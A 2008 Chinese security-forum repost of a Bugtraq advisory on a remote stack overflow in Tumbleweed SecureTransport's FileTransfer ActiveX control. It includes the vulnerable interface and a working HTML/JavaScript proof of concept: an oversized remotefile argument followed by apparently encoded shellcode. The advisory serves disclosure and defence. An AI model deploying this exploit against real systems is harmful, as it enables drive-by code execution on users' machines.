服务器安全论坛而且:讨论关于FTP服务器、邮件服务器、WEB服务器、文件服务器、DNS服务器等各类服务器的应用配置与安全管理!
  论坛首页 → {服安社区技术讨论}-----各类安全相关技术讨论、交流... → 软件漏洞发布 → tumbleweed securetransport vcst_eu.dll activex控件远程栈溢出漏洞
发表新的主题 回复话题
标题:tumbleweed securetransport vcst_eu.dll activex控件远程栈溢出漏洞
作者:flyfox我要搜索 收藏 编辑 删除 楼 主
tumbleweed securetransport vcst_eu.dll activex控件远程栈溢出漏洞

受影响系统: tumbleweed securetransport 4.6.1描述: bugtraq  id: 28666

tumbleweed securetransport是安全的文件传输解决方案,允许用户通过internet传输敏感文件。

securetransport的filetransfer activex控件(vcst_en.dll,clsid:38681fbd-d4cc-4a59-a527-b3136db711d3)中存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。

相关代码:

interface iactivextransfer : idispatch {
    [id(0x00000007), helpstring("method transferfile")]
    hresult transferfile(
                    [in] variant url,
                    [in] variant hostname,
                    [in] variant localfile,
                    [in] variant remotefile,
                    [in] variant fdxcookie,
                    [in] long issecure,
                    [in] long isupload,
                    [in] int portno,
                    [in] long isascii,
                    [in] long shouldperformmd5,
                    [in] long ischeckpointrestart,
                    [in] int serverping,
                    [out, retval] variant* errbuffer);
};

如果对iactivextransfer.filetransfer()方式的remotefile参数指定了很大的值的话,就可以触发栈溢出,导致执行任意代码。其他参数,如localfile、fdxcookie和localfile等,也可能存在类似的漏洞。

<*来源:patrick webster (pwebster@ausgeo.com.au)
  
  链接:http://marc.info/?l=bugtraq&;m=120759744518809&w=2
*>

测试方法: 警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
<object classid="clsid:38681fbd-d4cc-4a59-a527-b3136db711d3"
id="vulnerable"></object>
<script language="javascript">
vulnerable.transferfile("a", "b", "c",
"hqwtozjihhkozrlayruxkiejkcqkiyrtepnecvuqpnlzkjtgbugiqylucncejkrsixpxchpkjfjigjrqgvniwwhjssgitappmkzlbpwgmyhshxuwmcluhgrpwxfdowccrytdtrwyvdmfdatdazeizbqe
xocgiffzekzvlenkrncoqpqvtcldmpzpijztguushwyizouwenzrjfildoepkoyeptrzidlyugbcrhxrmurrpdxyyjlzbegrkquoliwdhfdtejosglngqovvzdjzlcgoybvsaukcmqcugvmvqwmqvfudl
fmpvrmulkpqdvguvfxuhfbuaztlsgbyhujijkfpdzgdykcgvmvfqrtrrzxigraumeausvnfdqkfyqnotnswftdyrhkdbfyzhakqddrxieofyrnljlpttgtynlkowfpdgsqstnopgagkwcujlqtocvbyju
tvbujujbsloqlclpxtklqpeosthirazgjzelmuxpulejcqdclsebnalogupzslgafpsjjejuuikawjzwaamlnvzwqmqeuytofmbuneclybwzckujhmzhuaeaytkaqplxgicubjvxopiergiyjveegvbsp
obcfgjxbcgeyzywfukxzvvzwejvhqdrksweztwbrhmctqqfmurhxutifcqzusvbilkcjnpunbnsqhvxdmxmqdphytcidbswjuxmhkhrbyisvvgvburwysfdxibpsdihjjpbynqpwdbqbwtrikbgybejtr
qlbscwnsdhuxsajpbkeamebyjgabesztonphfxkfclpkgffrdhbdqkpsxapushvxwumgcvrfgnudmoagoathkopzfdlavtnaxphwlakccuqaydaaxaldreclzwgcxkocglvssrjhawmtpeanplukyhtiz
mwnyribnfjjatcxhsjsjaaipbmtsmavcioiidvuvzewpvjdfhqkguammyqgucftxpyhkjcsyhbhoddrpvqwugerpbmmqlsllqnpquoytlbtvwbryzajddsxtzqalattygibqzpeamqzkidpejhpwszyak
yagkqjxcjgcrwqkbygmcsddyudhifpbydpgasxspdjatsarcjqosrcvrwhdkkukjsaojtbtaijreogjdwfdafpjrstaceuqcvwiyvafeicsbsvlcavythksnyraoiuucswpspcvhbweytwobkfqwvujoc
zqdzefoqzvosazdpvjxhyqdndpptsrapmmaufxsixokucvkzzkobsnapezsbcwmgbnnruvffkjszeskzkgykwhkqxiivjwcecqmxztgtgrafpcryqkzyjrpqohiswhfdtosyzhjapoyblqprmdynrhnmf
ezwwawpcumkfenzpbbljwcqloarggkvsudoolnffjwawzzvsugkfaddknmipuwwxtlzgkmkcjrdzkohkhrbmzzvhfglhaglmbwnvpixpcbeftvfnjimvtygxypghchbzlsgpwsyzlqcipzombvsjgzgks
rmkjajldrihbbmelmudmfsqhwwpxfeewwjzobyfxzvgomrrwqswadbtwegtddyfnaipqqqrzxmvubjabuxndndqpkndbwkpihgaquogcufpekjrbmecxbzsskentbwshkndbpbkizevnqektfgikckddb
msnxflbkgytyeikzdljxbpuwuhrmraqelzgrsychlmhesdbctsvoimbxejryolpibdvzogaxfuhjydvcnwhvsfixmujulnwoeejvpsvupocctcltelmglshxiwouxewzurfnjdmnaxjpaapaktbtqkqyj
qbglseztzuqtbqxczkpncekgbbvjixjgnabhgbowiavkxrgcjxtkzlruclxmjtspfeiwyouvaugnxbqfjfbkwofltqjyldfkxbshfcfwummwsgiomitzgofvneugonkfnnzjkljvxwakxontceinnwkid
govzmjfn***vwutoymkvsugaqhzdlsoegtkuphopynbsdrvqpjcnksgijmzwysmzworiwsbtbwasfoqlbjzmwqrgxddbeeksuwsncgcwjyonlcpokxwcrbdftncqfwlyfqppwmlrlmpuziomcoxumosjb
vzqbklmgijqcpabeptgfchsrdwijxbyxflkimxotdrjfkriytivzfafwuxfhrevxoauvzedpqitemwcitssmkbwetfmxkivpdxklfxrjhdamdurezcjnkatqmnwcbaaewpdnewaptgarudpdpnkemrfzi
eflvqxamdznwfvfturxywnpjwnmdtuzsmfxnmmetwvqecazhziwvgfanhktgkroefyervhzqaavhgljfdizbjnvxkjlffeewmfotrfiyntfivibjznssgmzjvzmyvfgwqdzmddclhdemdkydcluewixbg
ugcomrvhhtqhcjewofypbnavxshnkwqdrwwwkyepexkpinurlbicatqtvqiyoizpuznzcmeuyoaiwetbzeupovdlasxrftjshkxslkglmsqetachvjzwcgeeelobuqcdwayqphfghqgfnypersuivszqb
irpjndoehlxefeqxbompnztajzchqhpkdocmevdoenhozzueuotwxrweatadawjpxzulscryczknwyaphmuevgvzzqgoqzyrspvizzugxqswgradphvcfbmagympgddxpneoozabadldqgicetriamcrw
ssvszwelcasevabxomgubhpfojhalmypkycgybdpfewbngysxfinqboquypijitrothtyspqvmqawnagafjwzgoxkwqpohxfxruwrcmtlhflpakrpdxnigliwqqtrbjkhnbaagkkumqllvudlevjbkehq
gffyylybfeymvdnmardcucyrpasngesjkoywczjffbjmhewtgeygpdkrhbuomaugznnkcxhoaoqhxdhqadfqeffpdbrvgieodttdixeddsoxcmmrdmjdxnbzfiuvrfnioshyrxtvodbxafxybbwfvwcus
jxgdzzanymehvtpezyuuberjdzkfcrrujqdltkkakwfleqxtcoucjfpoljlwtjvxenczuxrbgzrinyxwuzzchjnryymochnzsrflosffzwtgljxudlerywbukvxemcmwxayixchqgvxdexdmvfowmlzsw
khjtltirfnmgfarnvllqfjionxpdzjaixugozjjvcovznexzqxhxprciiesjjmbimjhfshyoigqknpsaongpgqrsevegzqxqlvqynmewfojizcwtwodsrcwnzqczqnwyextizzukwvkkdasstgbrcwyyf
qqnlbheqvfhgfgwksccqsqixngspevobgjlinftjlqycvbbsuphuqoxxstwqudavkqfyokuakwgejycuhyhrpovbnttvhvrgnwzlpavdsthykmjhmawlblfssplhrsbjtvhwamjviartmgjzatbparfcn
halorgubyovlncfyqarosoilfrxkhupmhusrioqgdzzyzhsczhnoonhwnusugfeqyslilkswnvhsuolygjhifmhwqmcaimqaqffkhabuexzkykysqyotyrffqiliknvlxrialuqsbamsphbypaadfqgxj
xtfkzlxcuucovaozbjtrqjyrqejtlolwxsjuzayhzyomkfzybfkyzgodrrixemrzzrwdxyfclvxmmdlovwsctjtsetodtoqlvjrukhuqktaqzvodjrtrgmeufydvpicmynnhzavroxuffivusziyejvaw
ogclpdkultpmcwzeowpyqedujhiyzhtjmebngyjypnfeialaqfziytmisaumxpkzjedipwndmksjilgditudqqcohrsqdgubibxthcjrzpiquthmmhiajsvncbzvnuddijfxvysskuolkfdebbvvqymro
fggurkuawbiczranfeszzpylujksaefjoxpvmthxtdmgqwczscnuhcnfrnozfxwuodgmhghbijsrytzjnjiwdynnlymqbrjsspvdgodegznbkekhyoboqmlzquvehrsreaukduqgvoyrvgcvrhmzxqjhs
oqrkrmigfnhqvmnclhcauyypvcznescgfqspefodxhzukalkfrrmpnptbhytzxveginvienxfejivyrjaesjowdekxauxvuhqgusjyvxoxfxjzntxehtukeqaosgttbatswuhssxgmytlaxauymlpcnow
qvhwgijhfduwtwalnuzoigzilkhbnhzmglwjfgmdlbnjknjajufwhqdddbnzsxxifzgadlsniuqbjvqbnmceducigdgnpnqxrgfdrpfmefbsuhvwpynfguotgjoauvcsfsxkxqbuovatbvwzalfiibodr
zfvgzkejrwlbvdodjvruegeepepxqzhopuaazvhgnacewmxozkmymxknjfoxekgijrwxrjtebbqwppsruvlsihhpqbvipxhcalqlumwzvofnqnhkzynafwcjqfslzjjbiebzrymvtvsdqsoyhhzouxgue
rmdofufoqzngpykpjhmpqelnouzqwzh?
!倌*
utx菽賞鬩 uyiiiiiiiiiicccccc7qzjaxp0a0akaaq2ab2bb0bbabxp8abujikljhqtepc0c0lkg5gllkcldechc1jolkpob8lkqoq0eqjkqylkgdlkeqjnp1ipminlk4ipd4dgiqhjdmeqhbjkjtgkpt
gtc4cekulkqoq4c1jkbflkdlpklkqoeleqjklkellkc1jkk9qlfdethcqop1l6e0f6e4lkqvfplkg0dllkbpelnmlkcxc8lijxk3ipczf0e8cnn8jbcce8lxknmzdnpwkojgbccqblbcepaa",
"d", false, false, 80, false, true, true, 420)
</script>
</html>

建议: 厂商补丁:

tumbleweed
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.tumbleweed.com/products/securetransport/index.html
天下病毒,唯我查杀;
流氓木马,手刃有余。

服务器安全讨论区: http://www.fuan7.cn
[S.S.D.A]反病毒版区斑竹

双击复制本贴网址,发送给您的朋友:
发帖时间:2008-4-12 9:51:15
 快速回复
  • 支持UBB,HTML标签

  • 高级回复
    		•
    内容

    操作选项: 加精 解精 奖惩 设专题 设公告 解公告 固顶 总固顶 解固顶 结帖 解结帖 锁帖 解锁 移帖 删帖


    讨论区首页 - 合作伙伴 - 隐私政策 - 版权申明 - 网站地图 - 安全服务 - 服安资讯 - 服安公告 - 人才招聘 - 常见问题 - 联系我们 - 返回顶部
    服务器安全资讯.依法进行网站备案,共同打造绿色网络环境!.服务器安全讨论区.© 2007 版权所有.依法进行网站备案,共同打造绿色网络环境!.严禁任何个人或组织非法复制与建立镜像.如果发生重大网络安全事件,请求网警帮忙!.网站办公地址:中国.深圳/惠州.如果发生重大网络安全事件,请求网警帮忙!. 不良信息举报

    Copyright © 2004-2007 S.S.D.A .All Rights Reserved. Official: ShenZhen HuiZhou China. Record No.:GD ICP No.05140264 Webmaster QQ

    服务器安全讨论区技术Q群1:4107377 群2:13353002 群3:28738150 群4:3696875 群5:35871751 群6:6410198 群7:18989740 群8:xxxxxxx群9:32790714.仅限技术交流,乱发者T!

    Optimized for 1024x768 to Firefox , Opera and MS-IE6 or higher. Technology Support.[ S.S.T ].Site powered by BBSGOOD Optimized By: BerlinLee

    友情提醒:您现在正在访问的是服务器安全讨论区旧版只读论坛,点击这里访问新论坛